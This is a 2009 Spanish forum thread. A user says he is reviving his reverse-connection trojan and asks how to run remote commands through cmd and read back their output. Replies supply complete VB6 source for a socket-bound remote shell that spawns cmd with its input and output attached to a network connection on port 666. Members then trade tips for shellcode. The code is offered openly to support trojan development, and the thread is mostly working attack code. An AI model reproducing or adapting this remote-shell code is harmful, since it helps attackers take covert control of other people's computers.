Título: Ayuda con CMD Pipe vb6
Publicado por: hepy_92 en 12 Diciembre 2009, 05:06 am
hola hace unos años cree un troyano de multiconexion inversa ahora lo retome ya que lo quiero volver a usar y estoy en proceso para poder enviar comandos a la cmd remota y poder volver a recibir lo que pasa (EJ: pongo dir C:\ y me devuelve el resultado, enlistando los archivos en C:\) para esto encontre este codigo de cmd pipe 'Redirects output from console program to textbox. 'Requires two textboxes and one command button. 'Set MultiLine property of Text2 to true. ' 'Original bcx version of this program was made by ' dl <dl@tks.cjb.net> 'VB port was made by Jernej Simoncic <jernej@isg.si> 'Visit Jernejs site at http://www2.arnes.si/~sopjsimo/ ' 'Note: don't run plain DOS programs with this example 'under Windows 95,98 and ME, as the program freezes when 'execution of program is finnished.
Option Explicit Private Declare Function CreatePipe Lib "kernel32" (phReadPipe As Long, phWritePipe As Long, lpPipeAttributes As SECURITY_ATTRIBUTES, ByVal nSize As Long) As Long Private Declare Sub GetStartupInfo Lib "kernel32" Alias "GetStartupInfoA" (lpStartupInfo As STARTUPINFO) Private Declare Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long Private Declare Function SetWindowText Lib "user32" Alias "SetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String) As Long Private Declare Function ReadFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Any, ByVal nNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, lpOverlapped As Any) As Long Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Type SECURITY_ATTRIBUTES nLength As Long lpSecurityDescriptor As Long bInheritHandle As Long End Type
Private Type PROCESS_INFORMATION hProcess As Long hThread As Long dwProcessId As Long dwThreadId As Long End Type
Private Type STARTUPINFO cb As Long lpReserved As Long lpDesktop As Long lpTitle As Long dwX As Long dwY As Long dwXSize As Long dwYSize As Long dwXCountChars As Long dwYCountChars As Long dwFillAttribute As Long dwFlags As Long wShowWindow As Integer cbReserved2 As Integer lpReserved2 As Byte hStdInput As Long hStdOutput As Long hStdError As Long End Type
Private Type OVERLAPPED ternal As Long ternalHigh As Long offset As Long OffsetHigh As Long hEvent As Long End Type
Private Const STARTF_USESHOWWINDOW = &H1 Private Const STARTF_USESTDHANDLES = &H100 Private Const SW_HIDE = 0 Private Const EM_SETSEL = &HB1 Private Const EM_REPLACESEL = &HC2
Private Sub Command1_Click() Command1.Enabled = False Redirect Text1.Text, Text2 Command1.Enabled = True End Sub Private Sub Form_Load() Text1.Text = "ping" End Sub Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer) If Command1.Enabled = False Then Cancel = True End Sub
Sub Redirect(cmdLine As String, objTarget As Object) Dim i%, t$ Dim pa As SECURITY_ATTRIBUTES Dim pra As SECURITY_ATTRIBUTES Dim tra As SECURITY_ATTRIBUTES Dim pi As PROCESS_INFORMATION Dim sui As STARTUPINFO Dim hRead As Long Dim hWrite As Long Dim bRead As Long Dim lpBuffer(1024) As Byte pa.nLength = Len(pa) pa.lpSecurityDescriptor = 0 pa.bInheritHandle = True pra.nLength = Len(pra) tra.nLength = Len(tra)
If CreatePipe(hRead, hWrite, pa, 0) <> 0 Then sui.cb = Len(sui) GetStartupInfo sui sui.hStdOutput = hWrite sui.hStdError = hWrite sui.dwFlags = STARTF_USESHOWWINDOW Or STARTF_USESTDHANDLES sui.wShowWindow = SW_HIDE If CreateProcess(vbNullString, cmdLine, pra, tra, True, 0, Null, vbNullString, sui, pi) <> 0 Then SetWindowText objTarget.hwnd, "" Do Erase lpBuffer() If ReadFile(hRead, lpBuffer(0), 1023, bRead, ByVal 0&) Then SendMessage objTarget.hwnd, EM_SETSEL, -1, 0 SendMessage objTarget.hwnd, EM_REPLACESEL, False, lpBuffer(0) DoEvents Else CloseHandle pi.hThread CloseHandle pi.hProcess Exit Do End If CloseHandle hWrite Loop CloseHandle hRead End If End If End Sub para enviar comandos como cd o dir hay que anteponer un "cmd /k" (Ej: cmd /k dir C:\) no me pregunten por que (si alguien me puede explicar porque hay que hacerlo se agradece jajaja) pero bueno el problema es que al enviar un comando como un dir o cd, me sale este error: Error '9' en tiempo de ejecucion: el subindice esta fuera del intervalo
ayuda porfavor! gracias de antemano
Título: Re: Ayuda con CMD Pipe vb6
Publicado por: cobein en 12 Diciembre 2009, 13:38 pm
Hay una manera de hacer esto correctamente y es conectar el stdio a un socket, despues si tengo un rato lo hago y lo posteo.
Título: Re: Ayuda con CMD Pipe vb6
Publicado por: hepy_92 en 12 Diciembre 2009, 16:33 pm
ok se agradeceria mucho! alguna otra idea? gracias ;D
Título: Re: Ayuda con CMD Pipe vb6
Publicado por: hepy_92 en 13 Diciembre 2009, 16:34 pm
como saber que timer es el que esta "fuera del intervalo"? y que significa que esta fuera del intervalo? perdon si es algo noob mi pregunta pero hace mucho que no toco el vb 6 Error '9' en tiempo de ejecucion: el subindice esta fuera del intervalo gracias :)
Título: Re: Ayuda con CMD Pipe vb6
Publicado por: shaggikpo en 14 Diciembre 2009, 02:33 am
en que linea exactamente se produce el error?
Título: Re: Ayuda con CMD Pipe vb6
Publicado por: cobein en 14 Diciembre 2009, 05:23 am
Bien, aca esta el ejemplo '--------------------------------------------------------------------------------------- ' Module : mMS ' DateTime : 12/13/2009 20:16 ' Author : Cobein ' Mail : cobein27@hotmail.com ' WebPage : http://www.advancevb.com.ar ' Purpose : Remote shell ' Usage : At your own risk ' Requirements: None ' Distribution: You can freely use this code in your own ' applications, but you may not reproduce ' or publish this code on any web site, ' online service, or distribute as source ' on any media without express permission. ' ' Reference : NGS - Writing small shellcode paper ' ' History : 12/13/2009 First Cut.................................................... '--------------------------------------------------------------------------------------- Option Explicit
Private Const INFINITE As Long = &HFFFF Private Const SOCK_STREAM As Long = 1 Private Const AF_INET As Long = 2 Private Const IPPROTO_TCP As Long = 6 Private Const STARTF_USESTDHANDLES As Long = &H100 Private Const STARTF_USESHOWWINDOW As Long = &H1
Private Const WSADESCRIPTION_LEN As Long = 257 Private Const WSASYS_STATUS_LEN As Long = 129
Public Type WSAData wVersion As Integer wHighVersion As Integer szDescription As String * WSADESCRIPTION_LEN szSystemStatus As String * WSASYS_STATUS_LEN iMaxSockets As Integer iMaxUdpDg As Integer lpVendorInfo As Long End Type
Public Type sockaddr_in sin_family As Integer sin_port As Integer sin_addr As Long sin_zero(1 To 8) As Byte End Type
Private Type SECURITY_ATTRIBUTES nLength As Long lpSecurityDescriptor As Long bInheritHandle As Long End Type
Private Type PROCESS_INFORMATION hProcess As Long hThread As Long dwProcessId As Long dwThreadId As Long End Type
Private Type STARTUPINFO cb As Long lpReserved As String lpDesktop As String lpTitle As String dwX As Long dwY As Long dwXSize As Long dwYSize As Long dwXCountChars As Long dwYCountChars As Long dwFillAttribute As Long dwFlags As Long wShowWindow As Integer cbReserved2 As Integer lpReserved2 As Byte hStdInput As Long hStdOutput As Long hStdError As Long End Type
Private Declare Function WSAStartup Lib "ws2_32.dll" (ByVal wVR As Long, lpWSAD As WSAData) As Long Private Declare Function WSACleanup Lib "ws2_32.dll" () As Long Private Declare Function bind Lib "ws2_32.dll" (ByVal s As Long, ByRef name As sockaddr_in, ByRef namelen As Long) As Long Private Declare Function listen Lib "ws2_32.dll" (ByVal s As Long, ByVal backlog As Long) As Long Private Declare Function accept Lib "ws2_32.dll" (ByVal s As Long, ByRef addr As sockaddr_in, ByRef addrlen As Long) As Long Private Declare Function CreateProcessA Lib "kernel32" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As SECURITY_ATTRIBUTES, lpThreadAttributes As SECURITY_ATTRIBUTES, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long Private Declare Function WaitForSingleObject Lib "kernel32" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long Private Declare Function htons Lib "wsock32.dll" (ByVal hostshort As Long) As Integer Private Declare Function WSASocketA Lib "ws2_32.dll" (ByVal af As Long, ByVal lType As Long, ByVal protocol As Long, ByRef lpProtocolInfo As Any, ByRef g As Any, ByVal dwFlags As Long) As Long Private Declare Function closesocket Lib "wsock32.dll" (ByVal s As Long) As Long
Public Sub Main() Dim lSock As Long Dim tSA As sockaddr_in Dim tWD As WSAData Dim lHandle As Long Const PORT As Long = 666 If WSAStartup(&H101, tWD) = 0 Then lSock = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, ByVal 0&, ByVal 0&, ByVal 0&) If Not lSock = -1 Then With tSA .sin_family = 2 .sin_port = htons(PORT) End With If bind(lSock, tSA, Len(tSA)) = 0 Then If listen(lSock, 0&) = 0 Then lHandle = accept(lSock, tSA, Len(tSA)) Dim tSTARTUPINFO As STARTUPINFO Dim tPROCESS_INFORMATION As PROCESS_INFORMATION Dim tSECURITY_ATTRIBUTES As SECURITY_ATTRIBUTES tSECURITY_ATTRIBUTES.nLength = Len(tSECURITY_ATTRIBUTES) With tSTARTUPINFO .cb = Len(tSTARTUPINFO) .dwFlags = STARTF_USESTDHANDLES Or STARTF_USESHOWWINDOW .hStdInput = lHandle .hStdOutput = lHandle .hStdError = lHandle End With If CreateProcessA(vbNullString, "cmd", _ tSECURITY_ATTRIBUTES, tSECURITY_ATTRIBUTES, True, 0, _ 0&, CurDir, tSTARTUPINFO, tPROCESS_INFORMATION) Then Call WaitForSingleObject(tPROCESS_INFORMATION.hProcess, INFINITE) End If End If End If Call closesocket(lHandle) End If
Call WSACleanup End If End Sub Algunas cosas para que tengan en cuenta. 1- el codigo se va a freezar a la espera de una conexión 2- hay muchas estructuras que se pueden obviar pero las deje pora que el ejemplo sea mas claro. 3- se pueden conectar usando telnet (open localhost 666) en Vista y no se si en 7 telnet no esta instalado por defecto.
Título: Re: Ayuda con CMD Pipe vb6
Publicado por: Karcrack en 14 Diciembre 2009, 16:59 pm
Muy bonito el code ;D Solo una cosa: If CreateProcessA(vbNullString, "cmd", _ tSECURITY_ATTRIBUTES, tSECURITY_ATTRIBUTES, True, 0, _ 0&, CurDir, tSTARTUPINFO, tPROCESS_INFORMATION) Then Envez de 'cmd' creo que seria mejor '%COMSPEC%' ;)
Título: Re: Ayuda con CMD Pipe vb6
Publicado por: YST en 14 Diciembre 2009, 20:23 pm
Muy bonito el code ;D Solo una cosa: If CreateProcessA(vbNullString, "cmd", _ tSECURITY_ATTRIBUTES, tSECURITY_ATTRIBUTES, True, 0, _ 0&, CurDir, tSTARTUPINFO, tPROCESS_INFORMATION) Then Envez de 'cmd' creo que seria mejor '%COMSPEC%' ;) ¿En que PC no seria cmd ? :xD
Título: Re: Ayuda con CMD Pipe vb6
Publicado por: hepy_92 en 14 Diciembre 2009, 23:57 pm
no entendi en absoluto lo qe postiaste :S disculpa mi ignorancia soy newbie... pero qe es eso?
Título: Re: Ayuda con CMD Pipe vb6
Publicado por: Karcrack en 15 Diciembre 2009, 19:56 pm
¿En que PC no seria cmd ? :xD
Cualquier version de W$ anterior a XP :P De todos modos, variables de entorno ftw!!! :xD
Título: Re: Ayuda con CMD Pipe vb6
Publicado por: YST en 15 Diciembre 2009, 20:03 pm
¿En que PC no seria cmd ? :xD
Cualquier version de W$ anterior a XP :P De todos modos, variables de entorno ftw!!! :xD En windows 2000 esta ;) y la api CreateProcess esta desde ese win.. entonces el codigo siempre es cmd ya que si no es ejecutado en un sistema luego de windows 2000 no funcionara ;)
Título: Re: Ayuda con CMD Pipe vb6
Publicado por: Karcrack en 15 Diciembre 2009, 20:53 pm
En windows 2000 esta ;) y la api CreateProcess esta desde ese win.. entonces el codigo siempre es cmd ya que si no es ejecutado en un sistema luego de windows 2000 no funcionara ;)
En W$2000 se llama command, no cmd :-\
Título: Re: Ayuda con CMD Pipe vb6
Publicado por: YST en 15 Diciembre 2009, 21:24 pm
cmd.exe es el intérprete de comandos en OS/2 y sistemas basados en Windows NT (incluyendo Windows 2000, Windows XP, Windows Server 2003, y Windows Vista). http://es.wikipedia.org/wiki/Cmd_%28Windows%29
Título: Re: Ayuda con CMD Pipe vb6
Publicado por: Karcrack en 15 Diciembre 2009, 21:26 pm
Entonces no esta en W7 :huh: :huh: :laugh: :laugh: :laugh: :laugh:
Bueno, entonces pones la variable de entorno y punto! :¬¬ :¬¬
Título: Re: Ayuda con CMD Pipe vb6
Publicado por: YST en 15 Diciembre 2009, 22:41 pm
Entonces no esta en W7 :huh: :huh: :laugh: :laugh: :laugh: :laugh:
Bueno, entonces pones la variable de entorno y punto! :¬¬ :¬¬
No esta actualizado :¬¬ Por cierto la variable de entorno seria mas lenta :P
Título: Re: Ayuda con CMD Pipe vb6
Publicado por: Karcrack en 15 Diciembre 2009, 23:50 pm
Vaaaaaale... tienes razon :¬¬ :¬¬ Minimum supported client Windows 2000 Professional CreateProcessA/W esta a partir del W$ 2k... y a partir del W$ 2k se puede usar cmd... asi que... bueno, es mejor usar CMD directamente! :PAdemas, es mas util para shellcodes, ya que puedes pushear la cadena en el stack con un solo DWORD! :silbar: ; \0,D,M,C push $00646D63
:D
Título: Re: Ayuda con CMD Pipe vb6
Publicado por: hepy_92 en 18 Diciembre 2009, 14:26 pm
no entiendo nada :o alguien me puede explicar como lo hago?
Título: Re: Ayuda con CMD Pipe vb6
Publicado por: Karcrack en 18 Diciembre 2009, 15:40 pm
no entiendo nada :o alguien me puede explicar como lo hago?
Lo que te posteo Cobein fue una preciosa Shell Inversa(Reverse Shell) :-* :xD Si quieres mas info: http://www.ngssoftware.com/research/papers/WritingSmallShellcode.pdf
|